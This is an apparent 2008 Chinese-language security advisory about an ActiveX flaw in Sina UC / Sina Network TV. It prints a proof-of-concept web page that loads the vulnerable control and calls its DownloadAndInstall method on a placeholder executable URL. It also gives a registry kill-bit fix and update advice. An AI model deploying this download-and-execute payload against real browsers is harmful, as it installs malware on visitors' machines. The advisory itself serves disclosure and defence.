form:http://www.scanw.com/blog/archives/255
发布日期:2008-7-18
最后更新日期:2008-7-18 15:57(GMT)
受影响系统: 详细:
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.
目前厂商已经发布新浪网络电视修复版本并且进行强制升级.请用户及时更新软件.
Sina UC
新浪网络电视
测试方法:
以下代码可能包含恶意行为,请勿轻易尝试,使用者风险自负.
<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1=”http://127.0.0.1/xxx.exe”;
install[”DownloadAndInstall”](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>
推荐的应对方法:
UC的用户请继续关注http://www.51uc.com/进行更新.
也可以为clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}]
“Compatibility Flags”=dword:00000400
安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/
